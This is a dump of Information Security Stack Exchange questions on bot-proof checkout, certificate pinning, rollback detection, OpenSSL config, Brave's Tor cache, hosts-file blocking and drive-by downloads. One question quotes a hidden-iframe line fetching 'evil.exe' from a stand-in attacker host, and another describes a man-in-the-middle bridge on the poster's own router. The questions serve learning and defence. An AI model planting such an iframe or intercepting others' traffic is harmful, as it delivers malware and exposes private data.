The main issue I see with this is that the way I have implemented it is when they go to the password page and submit the password, if they enter the correct password then I give them a cookie with the password in it. Then, when they try and access the purchase page I check the cookie and only let them in if the password is correct. This also applies to POSTing their payment information to my server. The problem is that once they have the password, they can simply enter it into a bot that will then check out a bunch of times. Or even quicker they can have one enter it then copy the cookie and give it to all the others and check out faster and more times than any human could.

+ +

I have implemented reCaptcha v2, but honestly that is trivial to bypass with a captcha harvester.

+ +

I thought about generating a session ID for each user when they initially visit the password page (will stay the same if they visit again), then when they purchase the product I store their ID in a database. Then, when someone is checking out I see if their ID is in the database already, and if it is then I stop the checkout. This probably solves the cookie sharing issue but doesn't solve getting the password and just checking out multiple times at once via different sessions using Python aiohttp or something.

+ +

Tying the cookie to an IP address in a similar way also crossed my mind, but this can be easily circumvented with the use of proxies.

+ +

Does anyone have any suggestions as to how I can protect my website? I want my customers to be satisfied and so I would not like bots to be able to buy up all the stock before they can.

+ +

EDIT: Another thought was to still use a session ID, then store all session IDs and a boolean for whether or not they have checked out, such that it can be checked in the same way as before. However, I will also store a question ID along with the session ID. This question ID will represent a question that has been randomly selected from a dictionary of questions where the key is the ID and the value is the question and the answer. That way, provided I have enough questions and they aren't easy to solve with a bot, it will be very difficult for them to bot my site. An example of such a question could be ""What is the URL of the most viewed video on YouTube?"".

+ +

I realise all of this may seem unnecessary and like it's hurting the user but I think it is worth it.

+ +

EDIT2: What about reCaptcha v3? Is a reCaptcha v3 token verified in the same way as v2, i.e. can a v2 generated token using my domain (e.g. by using flask and changing the hosts file then making a captcha and generating tokens that way) be used instead of a v3 token even if my website is using v3, and Google will accept it?

+",225092,,225092,,1/15/2020 13:26,1/15/2020 13:26,How to prevent bots from checking out on my website,,0,12,,,,CC BY-SA 4.0 +224246,1,224248,,1/15/2020 13:49,,6,3519,"

I'm following this article : Android Security: SSL Pinning to implement certificate pinning in Android using OkHttp.

+ +

As our app clients do not update their app regulary I don't want to take the risk by using our server certification (Leaf certification) which will expire in about a month.

+ +
+

** Warning: Certificate Pinning is Dangerous!**

+ +

limits your server team’s abilities to update their TLS certificates. + By pinning certificates, you take on additional operational complexity + and limit your ability to migrate between certificate authorities. Do + not use certificate pinning without the blessing of your server’s TLS + administrator!Pinning certificates

+
+ +

In the above article, the author did use two approaches. In the first one he used the leaf and intermediate certification, but in the second one he only used the leaf certification.

+ +

Is it possible to use the leaf and the intermediate and when the leaf gets updated my app will still work?

+ +

Is it OK to only use intermediate pinning?

+",125662,,61443,,1/15/2020 14:27,1/8/2021 23:41,Certficate pinning: should I pin the leaf or intermediate?,,3,0,1,,,CC BY-SA 4.0 +224247,1,,,1/15/2020 14:13,,1,199,"

I need to store a frequently-changing set of encrypted data in a database. This can be encrypted and decrypted with an internal key. The data is based upon other metrics within the system, mostly the number of times various things have happened.

+ +

Encryption in this case only provides security by obscurity, in that if a person figures out where this data is stored and has database access then they can simply 'roll back' this encrypted blob to an earlier version, thus reverting its contents to a past state.

+ +

An HMAC of the data wouldn't help, as an adversary could simply roll back the HMAC along with the message it represents.

+ +

Is there a way that I can, at least, detect cryptographically that this data has been rolled back?

+ +

My feeling is that I'll need to make some element of the stored data refer to the current state of the system, or make it time-based.

+",128610,,,,,2/4/2022 3:01,Detecting/preventing rollback of encrypted data on a server,,2,2,,,,CC BY-SA 4.0 +224251,1,,,1/15/2020 15:44,,0,146,"

I'm trying intercept my router's ACS requests which are behind HTTPS. I don't think my router validates certificates so it is possible to do a MitM attack. I'm using a debian installed laptop with two ethernet interfaces eth0 and eth1. eth0 is connected to WAN port of the router and eth1 is connected to actual WAN.

+ +

I put this into /etc/network/interfaces:

+ +
iface br0 inet manual
+   bridge_ports eth0 eth1
+   up ip link set br0 promisc on arp off up
+   down ip link set br0 promisc off down
+
+ +

and executed:

+ +
brctl addbr br0
+brctl addif br0 eth0 eth1
+ifup br0
+
+ +

So far I am able to sniff the communication between my router and ISP but of course I can't see the content of https requests. I don't know where to go from there. I have tried to preroute the traffic coming to https port to 8080 (which burpsuite is listening transparently) with iptables but it didn't work. Actually I don't know how it would work with br0 isn't assigned to an ip address. So if anyone can help me here, I would be grateful.

+",225100,,,,,1/15/2020 15:44,Outside Router MitM Attack,,0,5,,,,CC BY-SA 4.0 +224253,1,,,1/15/2020 15:50,,1,1453,"

Creating certificate:

+ +
openssl req -new -newkey rsa:2048 -keyout private/cakey.pem -out careq.pem -config ./openssl.cnf
+
+ +

I have value that tells openssl not prompt for req_distinguished_name fields:

+ +
[ req ]
+prompt = no
+
+ +

If I use value ""no"" I get error:

+ +
problems making Certificate Request
+1995860064:error:0D07A097:asn1 encoding routines:ASN1_mbstring_ncopy:string too long:a_mbstr.c:158:maxsize=2
+
+ +

I suppose I need to fill all default values in configuration file. But what is missing?

+ +
Fragment of openssl.cnf:
+
+
+[ req ]
+prompt = no
+default_bits            = 2048
+#default_keyfile         = privkey.pem
+distinguished_name      = req_distinguished_name # where to get DN for reqs
+attributes              = req_attributes         # req attributes
+x509_extensions     = v3_ca  # The extentions to add to self signed certs
+req_extensions      = v3_req # The extensions to add to req's
+
+string_mask = nombstr
+
+
+[ req_distinguished_name ]
+countryName                     = Country Name (2 letter code)
+countryName_default             = US
+countryName_min                 = 2
+countryName_max                 = 2
+
+stateOrProvinceName             = State or Province Name (full name)
+stateOrProvinceName_default     = California
+
+localityName                    = Locality Name (eg, city)
+localityName_default            = Hawthorne
+
+0.organizationName              = Organization Name (eg, company)
+0.organizationName_default      = PhilNet
+
+organizationalUnitName          = Organizational Unit Name (eg, section)
+organizationalUnitName_default  = UN
+
+commonName                      = Common Name (eg, YOUR name)
+commonName_default              = CN
+commonName_max                  = 64
+
+emailAddress_default            = aaa@bbb.cc
+emailAddress                    = Email Address
+emailAddress_max    
+
+",161270,,,,,1/15/2020 18:51,Default values for distinguished_name,,1,0,,,,CC BY-SA 4.0 +224255,1,,,1/15/2020 16:53,,3,1189,"

I am using Brave Browser Version 1.0.0 Chromium: 78.0.3904.97 (Official Build) (64-bit) on Ubuntu 18.04. The browser has an option, open new private window with Tor . When looking into cache files today, I found a folder named ""Tor Profile"", and then subdirectories ""Cache"" and ""Code Cache"". They further have some subdirectories which finally have binary files, 'index' and 'the-real-index'. +I'm not sure about how the browsers function and whether this is shady or not, but why are these files even present on the system if they are related to what I browsed in that mode?

+ +

Note that no windows of that mode are active.

+",225107,,,,,1/27/2020 18:14,"""Tor Profile"" folder in Brave Browser cache",,2,2,,,,CC BY-SA 4.0 +224260,1,,,1/15/2020 19:15,,0,585,"

I am trying to protect a macOS computer. Specifically, I want to prevent the machine from making unwanted connections over the internet. +I am aware of firewalls of course. But I stumbled upon the idea of adding many domain names to /etc/hosts, and redirect them to 0.0.0.0 to prevent connections to them.

+ +

Is this method safe? I can see it does not prevent connecting directly to an IP. Would most malware be fooled by such a hosts configuration, or would they likely use directly an IP address, or not honour the /hosts file?

+ +

How should I compare using a firewall versus using the /etc/hosts file? I guess the most low level, the harder it is for malware to get around. So which method is lowest level?

+",143641,,,,,1/15/2020 19:25,Modifying host file versus firewall,,1,2,,,,CC BY-SA 4.0 +224273,1,224277,,1/15/2020 23:58,,0,264,"

Does the definition of a drive by download include malicious execution of an unaccepted downloaded file or is the unaccepted download of a file the drive by download by itself? I didn't find a good/clear definition.

+ +

Why is it possible to download files with a hidden iframe, so the user isn't even asked if he wants to download it. Something like this:

+ +
<iframe src=""https://attacker.com/evil.exe"" width=""1"" height=""1"" frameborder=""0""></iframe>
+
+ +

Isn't this way too risky?

+",225129,,6253,,1/16/2020 7:27,1/16/2020 7:27,Drive by download with iframes,